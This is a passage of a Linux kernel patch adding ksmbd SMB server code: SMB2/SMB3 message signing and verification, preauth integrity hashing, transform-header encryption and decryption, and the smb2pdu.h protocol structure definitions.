++	if ((rcv_hdr2->Flags & SMB2_FLAGS_SIGNED) &&
++	    command != SMB2_NEGOTIATE_HE &&
++	    command != SMB2_SESSION_SETUP_HE &&
++	    command != SMB2_OPLOCK_BREAK_HE)
++		return true;
++
++	return false;
++}
++
++/**
++ * smb2_check_sign_req() - handler for req packet sign processing
++ * @work:   smb work containing notify command buffer
++ *
++ * Return:	1 on success, 0 otherwise
++ */
++int smb2_check_sign_req(struct ksmbd_work *work)
++{
++	struct smb2_hdr *hdr;
++	char signature_req[SMB2_SIGNATURE_SIZE];
++	char signature[SMB2_HMACSHA256_SIZE];
++	struct kvec iov[1];
++	size_t len;
++
++	hdr = smb2_get_msg(work->request_buf);
++	if (work->next_smb2_rcv_hdr_off)
++		hdr = ksmbd_req_buf_next(work);
++
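++	/*
++	 * Bytes covered by the signature: the whole PDU for a single
++	 * request, NextCommand bytes for all but the last request of a
++	 * compound, and the remaining bytes for the last one.
++	 */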
++	if (!hdr->NextCommand && !work->next_smb2_rcv_hdr_off)
++		len = get_rfc1002_len(work->request_buf);
++	else if (hdr->NextCommand)
++		len = le32_to_cpu(hdr->NextCommand);
++	else
++		len = get_rfc1002_len(work->request_buf) -
++			work->next_smb2_rcv_hdr_off;
++
++	memcpy(signature_req, hdr->Signature, SMB2_SIGNATURE_SIZE);
++	memset(hdr->Signature, 0, SMB2_SIGNATURE_SIZE);
++
++	iov[0].iov_base = (char *)&hdr->ProtocolId;
++	iov[0].iov_len = len;
++
++	if (ksmbd_sign_smb2_pdu(work->conn, work->sess->sess_key, iov, 1,
++				signature))
++		return 0;
++
++	if (memcmp(signature, signature_req, SMB2_SIGNATURE_SIZE)) {
++		pr_err("bad smb2 signature\n");
++		return 0;
++	}
++
++	return 1;
++}
++
++/**
++ * smb2_set_sign_rsp() - handler for rsp packet sign processing
++ * @work:   smb work containing notify command buffer
++ *
++ */
++void smb2_set_sign_rsp(struct ksmbd_work *work)
++{
++	struct smb2_hdr *hdr;
++	struct smb2_hdr *req_hdr;
++	char signature[SMB2_HMACSHA256_SIZE];
++	struct kvec iov[2];
++	size_t len;
++	int n_vec = 1;
++
++	hdr = smb2_get_msg(work->response_buf);
++	if (work->next_smb2_rsp_hdr_off)
++		hdr = ksmbd_resp_buf_next(work);
++
++	req_hdr = ksmbd_req_buf_next(work);
++
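++	/*
++	 * Compounded responses are padded to an 8-byte boundary and
++	 * chained via NextCommand, so the aligned length is signed in
++	 * that case.
++	 */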
++	if (!work->next_smb2_rsp_hdr_off) {
++		len = get_rfc1002_len(work->response_buf);
++		if (req_hdr->NextCommand)
++			len = ALIGN(len, 8);
++	} else {
++		len = get_rfc1002_len(work->response_buf) -
++			work->next_smb2_rsp_hdr_off;
++		len = ALIGN(len, 8);
++	}
++
++	if (req_hdr->NextCommand)
++		hdr->NextCommand = cpu_to_le32(len);
++
++	hdr->Flags |= SMB2_FLAGS_SIGNED;
++	memset(hdr->Signature, 0, SMB2_SIGNATURE_SIZE);
++
++	iov[0].iov_base = (char *)&hdr->ProtocolId;
++	iov[0].iov_len = len;
++
++	if (work->aux_payload_sz) {
++		iov[0].iov_len -= work->aux_payload_sz;
++
++		iov[1].iov_base = work->aux_payload_buf;
++		iov[1].iov_len = work->aux_payload_sz;
++		n_vec++;
++	}
++
++	if (!ksmbd_sign_smb2_pdu(work->conn, work->sess->sess_key, iov, n_vec,
++				 signature))
++		memcpy(hdr->Signature, signature, SMB2_SIGNATURE_SIZE);
++}
++
++/**
++ * smb3_check_sign_req() - handler for req packet sign processing
++ * @work:   smb work containing notify command buffer
++ *
++ * Return:	1 on success, 0 otherwise
++ */
++int smb3_check_sign_req(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	char *signing_key;
++	struct smb2_hdr *hdr;
++	struct channel *chann;
++	char signature_req[SMB2_SIGNATURE_SIZE];
++	char signature[SMB2_CMACAES_SIZE];
++	struct kvec iov[1];
++	size_t len;
++
++	hdr = smb2_get_msg(work->request_buf);
++	if (work->next_smb2_rcv_hdr_off)
++		hdr = ksmbd_req_buf_next(work);
++
++	if (!hdr->NextCommand && !work->next_smb2_rcv_hdr_off)
++		len = get_rfc1002_len(work->request_buf);
++	else if (hdr->NextCommand)
++		len = le32_to_cpu(hdr->NextCommand);
++	else
++		len = get_rfc1002_len(work->request_buf) -
++			work->next_smb2_rcv_hdr_off;
++
++	if (le16_to_cpu(hdr->Command) == SMB2_SESSION_SETUP_HE) {
++		signing_key = work->sess->smb3signingkey;
++	} else {
++		chann = lookup_chann_list(work->sess, conn);
++		if (!chann)
++			return 0;
++		signing_key = chann->smb3signingkey;
++	}
++
++	if (!signing_key) {
++		pr_err("SMB3 signing key is not generated\n");
++		return 0;
++	}
++
++	memcpy(signature_req, hdr->Signature, SMB2_SIGNATURE_SIZE);
++	memset(hdr->Signature, 0, SMB2_SIGNATURE_SIZE);
++	iov[0].iov_base = (char *)&hdr->ProtocolId;
++	iov[0].iov_len = len;
++
++	if (ksmbd_sign_smb3_pdu(conn, signing_key, iov, 1, signature))
++		return 0;
++
++	if (memcmp(signature, signature_req, SMB2_SIGNATURE_SIZE)) {
++		pr_err("bad smb2 signature\n");
++		return 0;
++	}
++
++	return 1;
++}
++
++/**
++ * smb3_set_sign_rsp() - handler for rsp packet sign processing
++ * @work:   smb work containing notify command buffer
++ *
++ */
++void smb3_set_sign_rsp(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct smb2_hdr *req_hdr, *hdr;
++	struct channel *chann;
++	char signature[SMB2_CMACAES_SIZE];
++	struct kvec iov[2];
++	int n_vec = 1;
++	size_t len;
++	char *signing_key;
++
++	hdr = smb2_get_msg(work->response_buf);
++	if (work->next_smb2_rsp_hdr_off)
++		hdr = ksmbd_resp_buf_next(work);
++
++	req_hdr = ksmbd_req_buf_next(work);
++
++	if (!work->next_smb2_rsp_hdr_off) {
++		len = get_rfc1002_len(work->response_buf);
++		if (req_hdr->NextCommand)
++			len = ALIGN(len, 8);
++	} else {
++		len = get_rfc1002_len(work->response_buf) -
++			work->next_smb2_rsp_hdr_off;
++		len = ALIGN(len, 8);
++	}
++
++	if (!conn->binding &&
++	    le16_to_cpu(hdr->Command) == SMB2_SESSION_SETUP_HE) {
++		signing_key = work->sess->smb3signingkey;
++	} else {
++		chann = lookup_chann_list(work->sess, work->conn);
++		if (!chann)
++			return;
++		signing_key = chann->smb3signingkey;
++	}
++
++	if (!signing_key)
++		return;
++
++	if (req_hdr->NextCommand)
++		hdr->NextCommand = cpu_to_le32(len);
++
++	hdr->Flags |= SMB2_FLAGS_SIGNED;
++	memset(hdr->Signature, 0, SMB2_SIGNATURE_SIZE);
++	iov[0].iov_base = (char *)&hdr->ProtocolId;
++	iov[0].iov_len = len;
++	if (work->aux_payload_sz) {
++		iov[0].iov_len -= work->aux_payload_sz;
++		iov[1].iov_base = work->aux_payload_buf;
++		iov[1].iov_len = work->aux_payload_sz;
++		n_vec++;
++	}
++
++	if (!ksmbd_sign_smb3_pdu(conn, signing_key, iov, n_vec, signature))
++		memcpy(hdr->Signature, signature, SMB2_SIGNATURE_SIZE);
++}
++
++/**
++ * smb3_preauth_hash_rsp() - handler for computing preauth hash on response
++ * @work:   smb work containing response buffer
++ *
++ */
++void smb3_preauth_hash_rsp(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct ksmbd_session *sess = work->sess;
++	struct smb2_hdr *req, *rsp;
++
++	if (conn->dialect != SMB311_PROT_ID)
++		return;
++
++	WORK_BUFFERS(work, req, rsp);
++
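++	/*
++	 * SMB 3.1.1 preauth integrity: every NEGOTIATE and SESSION_SETUP
++	 * message, request and response alike, is folded into a running
++	 * hash that later salts the signing/encryption key derivation.
++	 */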
++	if (le16_to_cpu(req->Command) == SMB2_NEGOTIATE_HE &&
++	    conn->preauth_info)
++		ksmbd_gen_preauth_integrity_hash(conn, work->response_buf,
++						 conn->preauth_info->Preauth_HashValue);
++
++	if (le16_to_cpu(rsp->Command) == SMB2_SESSION_SETUP_HE && sess) {
++		__u8 *hash_value;
++
++		if (conn->binding) {
++			struct preauth_session *preauth_sess;
++
++			preauth_sess = ksmbd_preauth_session_lookup(conn, sess->id);
++			if (!preauth_sess)
++				return;
++			hash_value = preauth_sess->Preauth_HashValue;
++		} else {
++			hash_value = sess->Preauth_HashValue;
++			if (!hash_value)
++				return;
++		}
++		ksmbd_gen_preauth_integrity_hash(conn, work->response_buf,
++						 hash_value);
++	}
++}
++
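++/*
++ * Build the SMB2 transform header that precedes an encrypted payload.
++ * GCM ciphers use a 12-byte nonce and CCM ciphers an 11-byte one; the
++ * rest of the 16-byte Nonce field stays zero since tr_buf is cleared
++ * by the caller.
++ */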
++static void fill_transform_hdr(void *tr_buf, char *old_buf, __le16 cipher_type)
++{
++	struct smb2_transform_hdr *tr_hdr = tr_buf + 4;
++	struct smb2_hdr *hdr = smb2_get_msg(old_buf);
++	unsigned int orig_len = get_rfc1002_len(old_buf);
++
++	/* tr_buf must be cleared by the caller */
++	tr_hdr->ProtocolId = SMB2_TRANSFORM_PROTO_NUM;
++	tr_hdr->OriginalMessageSize = cpu_to_le32(orig_len);
++	tr_hdr->Flags = cpu_to_le16(TRANSFORM_FLAG_ENCRYPTED);
++	if (cipher_type == SMB2_ENCRYPTION_AES128_GCM ||
++	    cipher_type == SMB2_ENCRYPTION_AES256_GCM)
++		get_random_bytes(&tr_hdr->Nonce, SMB3_AES_GCM_NONCE);
++	else
++		get_random_bytes(&tr_hdr->Nonce, SMB3_AES_CCM_NONCE);
++	memcpy(&tr_hdr->SessionId, &hdr->SessionId, 8);
++	inc_rfc1001_len(tr_buf, sizeof(struct smb2_transform_hdr));
++	inc_rfc1001_len(tr_buf, orig_len);
++}
++
++int smb3_encrypt_resp(struct ksmbd_work *work)
++{
++	char *buf = work->response_buf;
++	struct kvec iov[3];
++	int rc = -ENOMEM;
++	int buf_size = 0, rq_nvec = 2 + (work->aux_payload_sz ? 1 : 0);
++
++	if (ARRAY_SIZE(iov) < rq_nvec)
++		return -ENOMEM;
++
++	work->tr_buf = kzalloc(sizeof(struct smb2_transform_hdr) + 4, GFP_KERNEL);
++	if (!work->tr_buf)
++		return rc;
++
++	/* fill transform header */
++	fill_transform_hdr(work->tr_buf, buf, work->conn->cipher_type);
++
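++	/*
++	 * iov[0]: length field + transform header; iov[1]: the SMB2
++	 * response body, encrypted in place; iov[2]: the optional
++	 * auxiliary payload (e.g. read data) kept in its own buffer.
++	 */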
++	iov[0].iov_base = work->tr_buf;
++	iov[0].iov_len = sizeof(struct smb2_transform_hdr) + 4;
++	buf_size += iov[0].iov_len - 4;
++
++	iov[1].iov_base = buf + 4;
++	iov[1].iov_len = get_rfc1002_len(buf);
++	if (work->aux_payload_sz) {
++		iov[1].iov_len = work->resp_hdr_sz - 4;
++
++		iov[2].iov_base = work->aux_payload_buf;
++		iov[2].iov_len = work->aux_payload_sz;
++		buf_size += iov[2].iov_len;
++	}
++	buf_size += iov[1].iov_len;
++	work->resp_hdr_sz = iov[1].iov_len;
++
++	rc = ksmbd_crypt_message(work, iov, rq_nvec, 1);
++	if (rc)
++		return rc;
++
++	memmove(buf, iov[1].iov_base, iov[1].iov_len);
++	*(__be32 *)work->tr_buf = cpu_to_be32(buf_size);
++
++	return rc;
++}
++
++bool smb3_is_transform_hdr(void *buf)
++{
++	struct smb2_transform_hdr *trhdr = smb2_get_msg(buf);
++
++	return trhdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM;
++}
++
++int smb3_decrypt_req(struct ksmbd_work *work)
++{
++	struct ksmbd_session *sess;
++	char *buf = work->request_buf;
++	unsigned int pdu_length = get_rfc1002_len(buf);
++	struct kvec iov[2];
++	int buf_data_size = pdu_length - sizeof(struct smb2_transform_hdr);
++	struct smb2_transform_hdr *tr_hdr = smb2_get_msg(buf);
++	int rc = 0;
++
++	if (buf_data_size < sizeof(struct smb2_hdr)) {
++		pr_err("Transform message is too small (%u)\n",
++		       pdu_length);
++		return -ECONNABORTED;
++	}
++
++	if (buf_data_size < le32_to_cpu(tr_hdr->OriginalMessageSize)) {
++		pr_err("Transform message is broken\n");
++		return -ECONNABORTED;
++	}
++
++	sess = ksmbd_session_lookup_all(work->conn, le64_to_cpu(tr_hdr->SessionId));
++	if (!sess) {
++		pr_err("invalid session id(%llx) in transform header\n",
++		       le64_to_cpu(tr_hdr->SessionId));
++		return -ECONNABORTED;
++	}
++
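++	/*
++	 * iov[0] spans the 4-byte length field plus the transform header,
++	 * iov[1] the encrypted payload, which is decrypted in place and
++	 * then moved down over the transform header below.
++	 */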
++	iov[0].iov_base = buf;
++	iov[0].iov_len = sizeof(struct smb2_transform_hdr) + 4;
++	iov[1].iov_base = buf + sizeof(struct smb2_transform_hdr) + 4;
++	iov[1].iov_len = buf_data_size;
++	rc = ksmbd_crypt_message(work, iov, 2, 0);
++	if (rc)
++		return rc;
++
++	memmove(buf + 4, iov[1].iov_base, buf_data_size);
++	*(__be32 *)buf = cpu_to_be32(buf_data_size);
++
++	return rc;
++}
++
++bool smb3_11_final_sess_setup_resp(struct ksmbd_work *work)
++{
++	struct ksmbd_conn *conn = work->conn;
++	struct ksmbd_session *sess = work->sess;
++	struct smb2_hdr *rsp = smb2_get_msg(work->response_buf);
++
++	if (conn->dialect < SMB30_PROT_ID)
++		return false;
++
++	if (work->next_smb2_rcv_hdr_off)
++		rsp = ksmbd_resp_buf_next(work);
++
++	if (le16_to_cpu(rsp->Command) == SMB2_SESSION_SETUP_HE &&
++	    sess->user && !user_guest(sess->user) &&
++	    rsp->Status == STATUS_SUCCESS)
++		return true;
++	return false;
++}
+diff --git a/fs/smb/server/smb2pdu.h b/fs/smb/server/smb2pdu.h
+new file mode 100644
+index 0000000000000..dd10f8031606b
+--- /dev/null
++++ b/fs/smb/server/smb2pdu.h
+@@ -0,0 +1,536 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef _SMB2PDU_H
++#define _SMB2PDU_H
++
++#include "ntlmssp.h"
++#include "smbacl.h"
++
++/* Create Action Flags */
++#define FILE_SUPERSEDED                0x00000000
++#define FILE_OPENED            0x00000001
++#define FILE_CREATED           0x00000002
++#define FILE_OVERWRITTEN       0x00000003
++
++/* SMB2 Max Credits */
++#define SMB2_MAX_CREDITS		8192
++
++/* BB FIXME - analyze following length BB */
++#define MAX_SMB2_HDR_SIZE 0x78 /* 4 len + 64 hdr + (2*24 wct) + 2 bct + 2 pad */
++
++#define SMB21_DEFAULT_IOSIZE	(1024 * 1024)
++#define SMB3_DEFAULT_TRANS_SIZE	(1024 * 1024)
++#define SMB3_MIN_IOSIZE		(64 * 1024)
++#define SMB3_MAX_IOSIZE		(8 * 1024 * 1024)
++#define SMB3_MAX_MSGSIZE	(4 * 4096)
++
++/*
++ *	Definitions for SMB2 Protocol Data Units (network frames)
++ *
++ *  See MS-SMB2.PDF specification for protocol details.
++ *  The Naming convention is the lower case version of the SMB2
++ *  command code name for the struct. Note that structures must be packed.
++ *
++ */
++
++struct preauth_integrity_info {
++	/* PreAuth integrity Hash ID */
++	__le16			Preauth_HashId;
++	/* PreAuth integrity Hash Value */
++	__u8			Preauth_HashValue[SMB2_PREAUTH_HASH_SIZE];
++};
++
++/* offset is sizeof smb2_negotiate_rsp but rounded up to 8 bytes. */
++#ifdef CONFIG_SMB_SERVER_KERBEROS5
++/* sizeof(struct smb2_negotiate_rsp) =
++ * header(64) + response(64) + GSS_LENGTH(96) + GSS_PADDING(0)
++ */
++#define OFFSET_OF_NEG_CONTEXT	0xe0
++#else
++/* sizeof(struct smb2_negotiate_rsp) =
++ * header(64) + response(64) + GSS_LENGTH(74) + GSS_PADDING(6)
++ */
++#define OFFSET_OF_NEG_CONTEXT	0xd0
++#endif
++
++#define SMB2_SESSION_EXPIRED		(0)
++#define SMB2_SESSION_IN_PROGRESS	BIT(0)
++#define SMB2_SESSION_VALID		BIT(1)
++
++#define SMB2_SESSION_TIMEOUT		(10 * HZ)
++
++struct create_durable_req_v2 {
++	struct create_context ccontext;
++	__u8   Name[8];
++	__le32 Timeout;
++	__le32 Flags;
++	__u8 Reserved[8];
++	__u8 CreateGuid[16];
++} __packed;
++
++struct create_durable_reconn_req {
++	struct create_context ccontext;
++	__u8   Name[8];
++	union {
++		__u8  Reserved[16];
++		struct {
++			__u64 PersistentFileId;
++			__u64 VolatileFileId;
++		} Fid;
++	} Data;
++} __packed;
++
++struct create_durable_reconn_v2_req {
++	struct create_context ccontext;
++	__u8   Name[8];
++	struct {
++		__u64 PersistentFileId;
++		__u64 VolatileFileId;
++	} Fid;
++	__u8 CreateGuid[16];
++	__le32 Flags;
++} __packed;
++
++struct create_app_inst_id {
++	struct create_context ccontext;
++	__u8 Name[8];
++	__u8 Reserved[8];
++	__u8 AppInstanceId[16];
++} __packed;
++
++struct create_app_inst_id_vers {
++	struct create_context ccontext;
++	__u8 Name[8];
++	__u8 Reserved[2];
++	__u8 Padding[4];
++	__le64 AppInstanceVersionHigh;
++	__le64 AppInstanceVersionLow;
++} __packed;
++
++struct create_mxac_req {
++	struct create_context ccontext;
++	__u8   Name[8];
++	__le64 Timestamp;
++} __packed;
++
++struct create_alloc_size_req {
++	struct create_context ccontext;
++	__u8   Name[8];
++	__le64 AllocationSize;
++} __packed;
++
++struct create_durable_rsp {
++	struct create_context ccontext;
++	__u8   Name[8];
++	union {
++		__u8  Reserved[8];
++		__u64 data;
++	} Data;
++} __packed;
++
++struct create_durable_v2_rsp {
++	struct create_context ccontext;
++	__u8   Name[8];
++	__le32 Timeout;
++	__le32 Flags;
++} __packed;
++
++struct create_mxac_rsp {
++	struct create_context ccontext;
++	__u8   Name[8];
++	__le32 QueryStatus;
++	__le32 MaximalAccess;
++} __packed;
++
++struct create_disk_id_rsp {
++	struct create_context ccontext;
++	__u8   Name[8];
++	__le64 DiskFileId;
++	__le64 VolumeId;
++	__u8  Reserved[16];
++} __packed;
++
++/* equivalent of the contents of SMB3.1.1 POSIX open context response */
++struct create_posix_rsp {
++	struct create_context ccontext;
++	__u8    Name[16];
++	__le32 nlink;
++	__le32 reparse_tag;
++	__le32 mode;
++	/* SidBuffer contains two sids (domain sid(28), UNIX group sid(16)) */
++	u8 SidBuffer[44];
++} __packed;
++
++struct smb2_buffer_desc_v1 {
++	__le64 offset;
++	__le32 token;
++	__le32 length;
++} __packed;
++
++#define SMB2_0_IOCTL_IS_FSCTL 0x00000001
++
++struct smb_sockaddr_in {
++	__be16 Port;
++	__be32 IPv4address;
++	__u8 Reserved[8];
++} __packed;
++
++struct smb_sockaddr_in6 {
++	__be16 Port;
++	__be32 FlowInfo;
++	__u8 IPv6address[16];
++	__be32 ScopeId;
++} __packed;
++
++#define INTERNETWORK	0x0002
++#define INTERNETWORKV6	0x0017
++
++struct sockaddr_storage_rsp {
++	__le16 Family;
++	union {
++		struct smb_sockaddr_in addr4;
++		struct smb_sockaddr_in6 addr6;
++	};
++} __packed;
++
++#define RSS_CAPABLE	0x00000001
++#define RDMA_CAPABLE	0x00000002
++
++struct network_interface_info_ioctl_rsp {
++	__le32 Next; /* next interface. zero if this is the last one */
++	__le32 IfIndex;
++	__le32 Capability; /* RSS or RDMA Capable */
++	__le32 Reserved;
++	__le64 LinkSpeed;
++	char	SockAddr_Storage[128];
++} __packed;
++
++struct file_object_buf_type1_ioctl_rsp {
++	__u8 ObjectId[16];
++	__u8 BirthVolumeId[16];
++	__u8 BirthObjectId[16];
++	__u8 DomainId[16];
++} __packed;
++
++struct resume_key_ioctl_rsp {
++	__u64 ResumeKey[3];
++	__le32 ContextLength;
++	__u8 Context[4]; /* ignored, Windows sets to 4 bytes of zero */
++} __packed;
++
++struct copychunk_ioctl_req {
++	__le64 ResumeKey[3];
++	__le32 ChunkCount;
++	__le32 Reserved;
++	__u8 Chunks[1]; /* array of srv_copychunk */
++} __packed;
++
++struct srv_copychunk {
++	__le64 SourceOffset;
++	__le64 TargetOffset;
++	__le32 Length;
++	__le32 Reserved;
++} __packed;
++
++struct copychunk_ioctl_rsp {
++	__le32 ChunksWritten;
++	__le32 ChunkBytesWritten;
++	__le32 TotalBytesWritten;
++} __packed;
++
++struct file_sparse {
++	__u8	SetSparse;
++} __packed;
++
++/* FILE Info response size */
++#define FILE_DIRECTORY_INFORMATION_SIZE       1
++#define FILE_FULL_DIRECTORY_INFORMATION_SIZE  2
++#define FILE_BOTH_DIRECTORY_INFORMATION_SIZE  3
++#define FILE_BASIC_INFORMATION_SIZE           40
++#define FILE_STANDARD_INFORMATION_SIZE        24
++#define FILE_INTERNAL_INFORMATION_SIZE        8
++#define FILE_EA_INFORMATION_SIZE              4
++#define FILE_ACCESS_INFORMATION_SIZE          4
++#define FILE_NAME_INFORMATION_SIZE            9
++#define FILE_RENAME_INFORMATION_SIZE          10
++#define FILE_LINK_INFORMATION_SIZE            11
++#define FILE_NAMES_INFORMATION_SIZE           12
++#define FILE_DISPOSITION_INFORMATION_SIZE     13
++#define FILE_POSITION_INFORMATION_SIZE        14
++#define FILE_FULL_EA_INFORMATION_SIZE         15
++#define FILE_MODE_INFORMATION_SIZE            4
++#define FILE_ALIGNMENT_INFORMATION_SIZE       4
++#define FILE_ALL_INFORMATION_SIZE             104
++#define FILE_ALLOCATION_INFORMATION_SIZE      19
++#define FILE_END_OF_FILE_INFORMATION_SIZE     20
++#define FILE_ALTERNATE_NAME_INFORMATION_SIZE  8
++#define FILE_STREAM_INFORMATION_SIZE          32
++#define FILE_PIPE_INFORMATION_SIZE            23
++#define FILE_PIPE_LOCAL_INFORMATION_SIZE      24
++#define FILE_PIPE_REMOTE_INFORMATION_SIZE     25
++#define FILE_MAILSLOT_QUERY_INFORMATION_SIZE  26
++#define FILE_MAILSLOT_SET_INFORMATION_SIZE    27
++#define FILE_COMPRESSION_INFORMATION_SIZE     16
++#define FILE_OBJECT_ID_INFORMATION_SIZE       29
++/* Number 30 not defined in documents */
++#define FILE_MOVE_CLUSTER_INFORMATION_SIZE    31
++#define FILE_QUOTA_INFORMATION_SIZE           32
++#define FILE_REPARSE_POINT_INFORMATION_SIZE   33
++#define FILE_NETWORK_OPEN_INFORMATION_SIZE    56
++#define FILE_ATTRIBUTE_TAG_INFORMATION_SIZE   8
++
++/* FS Info response  size */
++#define FS_DEVICE_INFORMATION_SIZE     8
++#define FS_ATTRIBUTE_INFORMATION_SIZE  16
++#define FS_VOLUME_INFORMATION_SIZE     24
++#define FS_SIZE_INFORMATION_SIZE       24
++#define FS_FULL_SIZE_INFORMATION_SIZE  32
++#define FS_SECTOR_SIZE_INFORMATION_SIZE 28
++#define FS_OBJECT_ID_INFORMATION_SIZE 64
++#define FS_CONTROL_INFORMATION_SIZE 48
++#define FS_POSIX_INFORMATION_SIZE 56
++
++/* FS_ATTRIBUTE_File_System_Name */
++#define FS_TYPE_SUPPORT_SIZE   44
++struct fs_type_info {
++	char		*fs_name;
++	long		magic_number;
++} __packed;
++
++/*
++ *	PDU query infolevel structure definitions
++ *	BB consider moving to a different header
++ */
++
++struct smb2_file_access_info {
++	__le32 AccessFlags;
++} __packed;
++
++struct smb2_file_alignment_info {
++	__le32 AlignmentRequirement;
++} __packed;
++
++struct smb2_file_basic_info { /* data block encoding of response to level 18 */
++	__le64 CreationTime;	/* Beginning of FILE_BASIC_INFO equivalent */
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le32 Attributes;
++	__u32  Pad1;		/* End of FILE_BASIC_INFO_INFO equivalent */
++} __packed;
++
++struct smb2_file_alt_name_info {
++	__le32 FileNameLength;
++	char FileName[];
++} __packed;
++
++struct smb2_file_stream_info {
++	__le32  NextEntryOffset;
++	__le32  StreamNameLength;
++	__le64 StreamSize;
++	__le64 StreamAllocationSize;
++	char   StreamName[];
++} __packed;
++
++struct smb2_file_ntwrk_info {
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 AllocationSize;
++	__le64 EndOfFile;
++	__le32 Attributes;
++	__le32 Reserved;
++} __packed;
++
++struct smb2_file_standard_info {
++	__le64 AllocationSize;
++	__le64 EndOfFile;
++	__le32 NumberOfLinks;	/* hard links */
++	__u8   DeletePending;
++	__u8   Directory;
++	__le16 Reserved;
++} __packed; /* level 18 Query */
++
++struct smb2_file_ea_info {
++	__le32 EASize;
++} __packed;
++
++struct smb2_file_alloc_info {
++	__le64 AllocationSize;
++} __packed;
++
++struct smb2_file_disposition_info {
++	__u8 DeletePending;
++} __packed;
++
++struct smb2_file_pos_info {
++	__le64 CurrentByteOffset;
++} __packed;
++
++#define FILE_MODE_INFO_MASK cpu_to_le32(0x0000100e)
++
++struct smb2_file_mode_info {
++	__le32 Mode;
++} __packed;
++
++#define COMPRESSION_FORMAT_NONE 0x0000
++#define COMPRESSION_FORMAT_LZNT1 0x0002
++
++struct smb2_file_comp_info {
++	__le64 CompressedFileSize;
++	__le16 CompressionFormat;
++	__u8 CompressionUnitShift;
++	__u8 ChunkShift;
++	__u8 ClusterShift;
++	__u8 Reserved[3];
++} __packed;
++
++struct smb2_file_attr_tag_info {
++	__le32 FileAttributes;
++	__le32 ReparseTag;
++} __packed;
++
++#define SL_RESTART_SCAN	0x00000001
++#define SL_RETURN_SINGLE_ENTRY	0x00000002
++#define SL_INDEX_SPECIFIED	0x00000004
++
++struct smb2_ea_info_req {
++	__le32 NextEntryOffset;
++	__u8   EaNameLength;
++	char name[1];
++} __packed; /* level 15 Query */
++
++struct smb2_ea_info {
++	__le32 NextEntryOffset;
++	__u8   Flags;
++	__u8   EaNameLength;
++	__le16 EaValueLength;
++	char name[1];
++	/* optionally followed by value */
++} __packed; /* level 15 Query */
++
++struct create_ea_buf_req {
++	struct create_context ccontext;
++	__u8   Name[8];
++	struct smb2_ea_info ea;
++} __packed;
++
++struct create_sd_buf_req {
++	struct create_context ccontext;
++	__u8   Name[8];
++	struct smb_ntsd ntsd;
++} __packed;
++
++struct smb2_posix_info {
++	__le32 NextEntryOffset;
++	__u32 Ignored;
++	__le64 CreationTime;
++	__le64 LastAccessTime;
++	__le64 LastWriteTime;
++	__le64 ChangeTime;
++	__le64 EndOfFile;
++	__le64 AllocationSize;
++	__le32 DosAttributes;
++	__le64 Inode;
++	__le32 DeviceId;
++	__le32 Zero;
++	/* beginning of POSIX Create Context Response */
++	__le32 HardLinks;
++	__le32 ReparseTag;
++	__le32 Mode;
++	/* SidBuffer contains two sids (UNIX user sid(16), UNIX group sid(16)) */
++	u8 SidBuffer[32];
++	__le32 name_len;
++	u8 name[1];
++	/*
++	 * var sized owner SID
++	 * var sized group SID
++	 * le32 filenamelength
++	 * u8  filename[]
++	 */
++} __packed;
++
++/* functions */
++void init_smb2_1_server(struct ksmbd_conn *conn);
++void init_smb3_0_server(struct ksmbd_conn *conn);
++void init_smb3_02_server(struct ksmbd_conn *conn);
++int init_smb3_11_server(struct ksmbd_conn *conn);
++
++void init_smb2_max_read_size(unsigned int sz);
++void init_smb2_max_write_size(unsigned int sz);
++void init_smb2_max_trans_size(unsigned int sz);
++void init_smb2_max_credits(unsigned int sz);
++
++bool is_smb2_neg_cmd(struct ksmbd_work *work);
++bool is_smb2_rsp(struct ksmbd_work *work);
++
++u16 get_smb2_cmd_val(struct ksmbd_work *work);
++void set_smb2_rsp_status(struct ksmbd_work *work, __le32 err);
++int init_smb2_rsp_hdr(struct ksmbd_work *work);
++int smb2_allocate_rsp_buf(struct ksmbd_work *work);
++bool is_chained_smb2_message(struct ksmbd_work *work);
++int init_smb2_neg_rsp(struct ksmbd_work *work);
++void smb2_set_err_rsp(struct ksmbd_work *work);
++int smb2_check_user_session(struct ksmbd_work *work);
++int smb2_get_ksmbd_tcon(struct ksmbd_work *work);
++bool smb2_is_sign_req(struct ksmbd_work *work, unsigned int command);
++int smb2_check_sign_req(struct ksmbd_work *work);
++void smb2_set_sign_rsp(struct ksmbd_work *work);
++int smb3_check_sign_req(struct ksmbd_work *work);
++void smb3_set_sign_rsp(struct ksmbd_work *work);
++int find_matching_smb2_dialect(int start_index, __le16 *cli_dialects,
++			       __le16 dialects_count);
++struct file_lock *smb_flock_init(struct file *f);
++int setup_async_work(struct ksmbd_work *work, void (*fn)(void **),
++		     void **arg);
++void smb2_send_interim_resp(struct ksmbd_work *work, __le32 status);
++struct channel *lookup_chann_list(struct ksmbd_session *sess,
++				  struct ksmbd_conn *conn);
++void smb3_preauth_hash_rsp(struct ksmbd_work *work);
++bool smb3_is_transform_hdr(void *buf);
++int smb3_decrypt_req(struct ksmbd_work *work);
++int smb3_encrypt_resp(struct ksmbd_work *work);
++bool smb3_11_final_sess_setup_resp(struct ksmbd_work *work);
++int smb2_set_rsp_credits(struct ksmbd_work *work);
++bool smb3_encryption_negotiated(struct ksmbd_conn *conn);
++
++/* smb2 misc functions */
++int ksmbd_smb2_check_message(struct ksmbd_work *work);
++
++/* smb2 command handlers */
++int smb2_handle_negotiate(struct ksmbd_work *work);
++int smb2_negotiate_request(struct ksmbd_work *work);
++int smb2_sess_setup(struct ksmbd_work *work);
++int smb2_tree_connect(struct ksmbd_work *work);
++int smb2_tree_disconnect(struct ksmbd_work *work);
++int smb2_session_logoff(struct ksmbd_work *work);
++int smb2_open(struct ksmbd_work *work);
++int smb2_query_info(struct ksmbd_work *work);
++int smb2_query_dir(struct ksmbd_work *work);
++int smb2_close(struct ksmbd_work *work);
++int smb2_echo(struct ksmbd_work *work);
++int smb2_set_info(struct ksmbd_work *work);
++int smb2_read(struct ksmbd_work *work);
